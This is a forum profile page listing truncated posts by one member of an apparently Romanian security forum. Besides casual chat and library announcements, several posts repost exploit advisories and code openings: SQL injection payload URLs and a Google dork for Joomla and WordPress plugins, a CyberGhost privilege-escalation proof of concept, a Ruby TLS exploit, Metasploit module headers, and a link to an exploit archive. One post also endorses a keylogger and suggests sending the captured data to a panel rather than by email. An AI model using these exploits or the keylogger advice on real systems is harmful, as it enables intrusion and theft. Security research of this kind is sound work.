Jump to content

KhiZaRix

Active Members
  • Content Count

    245
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by KhiZaRix

  1. Bine ai venit , like la prezentare.
  2. Eram sigur =))) am stat ceva timp prin Slatina.
  3. Joomla FocalPoint component version 1.2.3 suffers from a remote SQL injection vulnerability. # Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection # Date: 2017-03-23 # Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/ # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Home : http://persian-team.ir/ # Google Dork : inurl:index.php?option=com_focalpoint # Telegram Channel AND Demo: @PersianHackTeam # Tested on: WIN # POC : id Parameter Vulnerable to SQL Injection Put a Strin
  4. Prin ce oraș? pare ff cunoscut
  5. okay , cand se termină , adică Joi , vă contactez și vă explic.
  6. Stegano 0.6.9 Changes: Introduces some type hints (PEP 484). More tests for the generators and for the tools module. Updated descriptions of generators. Fixed a bug with a generator that has been previously renamed. Download: https://packetstormsecurity.com/files/download/141598/Stegano-0.6.9.tar.gz
  7. Salut , am să te contactez pe private și am să-ți explic.
  8. CODE : # # # # # # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery # Demo: http://www.apptha.com/demo/pica-photo-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?aid=[SQL] # For example; # -3+/*!50000union*/+select+0x4968
  9. Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information. Changes: Fixed an error when revealing a hidden binary file in an image. Download: https://packetstormsecurity.com/files/download/141562/Stegano-0.6.8.tar.gz Source: https
  10. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability. CODE: ------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. T
  11. # Exploit CyberGhost 6.0.4.2205 Privilege Escalation # Date: 06.03.2017 # Software Link: http://www.cyberghostvpn.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local 1. Description `CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want. https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html 2. Proof of Concept using System; using CyberGhost.Communication; namespace cyber { class Program { static vo
  12. @NickyRo Din cate știam Ardamaxu era bun. Doar că ți-aș recomanda să nu te joci cu focul. Și referitor la email, nu ți-aș recomanda pe email, ci un panel ceva.
  13. https://gyazo.com/55dca29bc0759fe726411422c1062bf5 Nu prea mult cu vorbe goale , doar puțină bătaie de cap. Mi-a luat aproximativ o oră să fac tot / testez. Diff: Moderat Reward: 404 HINT: Razele de lumină au fost oprite de către Caesar. Pentru mici HINT-uri, PM Succes. Se termină pe : 16.03.2017 Au rezolvat: #1 @u0m3 #2 @Usr6 #3 @new_luca #4 @Hertz
  14. Java Secure Socket Extension (JSSE) SKIP-TLS exploit that has been tested on JDK 8u25 and 7u72. This is a stand-alone ruby exploit and does not require Metasploit. #!/usr/bin/env ruby # encoding: ASCII-8BIT # By Ramon de C Valle. This work is dedicated to the public domain. require 'openssl' require 'optparse' require 'socket' Version = [0, 0, 1] Release = nil def prf(secret, label, seed) if secret.empty? s1 = s2 = '' else length = ((secret.length * 1.0) / 2).ceil s1 = secret[0..(length - 1)] s2 = secret[(length - 1)..(secret.length - 1)] end hmac_md5 = OpenSSL::H
  15. ?tiu c? nu prea mai am activitate ?i i really dont give a single fuck , but bro , dac? postezi un program de Hax0r Bruteforce de SSH specific? ?i tu mai multe (versiuni protocoale ?i etc.. ) , nu arunci un link ?i gata... , un scan ceva, în fine, nu recomand bruteforce de pe windows , mai ales dac? windowsul este pe pc-ul t?u Edit:// din câte am v?zut nu l-ai testat, prietene înainte s? arunci ceva testeaz?, nu arunci pe forum orice gunoi. nu m? considera hater dar asta este..
  16. 227 Exploits from August 2015 Source + Download : https://packetstormsecurity.com/files/download/133393/1508-exploits.tgz
  17. KhiZaRix

    pyDes

    Dac? este mare lenea de citit, d?-i un scroll pana jos la surs?. Author: Todd Whiteman Issue Date: 28th April, 2010 Version: 2.0.1 Compatibility: Requires Python 2.2 or higher, an older Python 1.5.2 compatible module can be found in the CVS source. Download ( Unix/PC ) = http://twhiteman.netfirms.com/pyDES/pyDes-2.0.1.tar.gz / http://twhiteman.netfirms.com/pyDES/pyDes-2.0.1.zip About pyDES This is a pure python implementation of the DES encryption algorithm. It is in pure python to avoid portability issues, since most DES implementations are programmed in C (for performance reasons). Triple
  18. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::OSX::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Mac OS X "tpwn" Privilege Escalation', 'Description' => %q{ This module exploits a null pointer dereference in XNU to escalate privileges to root. Tested
  19. ## # This module requires Metasploit: [url=http://metasploit.com/download]Penetration Testing Tool, Metasploit, Free Download | Rapid7[/url] # Current source: [url]https://github.com/rapid7/metasploit-framework[/url] ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution', 'Description' => %q{ Thi
  20. Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/image-export Vendor: www.1efthander.com Vendor Notified: 2015-07-05 Vendor Contact: https://twitter.com/1eftHander Description: Image Export plugin can help you selectively download images uploaded by an administrator . Vulnerability: The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to unlink the file after being down
  21. Gyazo - 0041a9f7e6035d2461f7b1c0820cbd05.png Pân? la urm? o fii bine ce o f?cut ?i @Aerosol, c? ?i a?a era mult? agita?ie cu anti-aerosol (hateri) sau alte c?caturi, cum ar fi luatul la mi?to ?i cuno?tin?ele lui, c? mul?i zic c? nu ?tie, c? nu face, c? nu ?tiu ce ... pân? la urm? înva?? omul( nu ?in cu nimeni doar o p?rere ).
  22. Serialepenet ? cumva? Gyazo - 0041a9f7e6035d2461f7b1c0820cbd05.png
  23. Salut pu?tiule , s? nu mergi pe partea gre?it? cu floodul nici nu am citit tot ?i totu?i mi-a s?rit în ochi ( IP ) , vezi ce faci pe skype, Bine ai venit, sper sa înve?i lucruri bune de aici
×
×
  • Create New...